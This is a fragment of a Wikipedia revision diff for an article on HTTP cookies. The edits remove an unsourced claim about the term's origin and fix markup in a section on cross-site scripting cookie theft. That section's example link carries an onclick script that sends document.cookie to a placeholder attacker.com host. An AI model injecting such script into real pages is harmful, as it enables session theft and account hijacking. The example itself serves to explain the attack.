Content deleted Content added
removing claim about origin of the term - the link is to a web design/SEO company and that page doesn't show its work; meanwhile, the talk page at Magic cookie (on which the same claim and link appeared and has been removed) has a lot of evidence that the origin is unknown |
→Cross-site scripting: cookie theft: fix syntaxhighlight error |
||
Line 270:
As an example, an attacker may post a message on <code>www.example.com</code> with the following link:
<syntaxhighlight lang="
<a href="#" onclick="window.___location = 'http://attacker.com/stole.cgi?text=' + escape(document.cookie); return false;">Click here!</a>
</syntaxhighlight>
|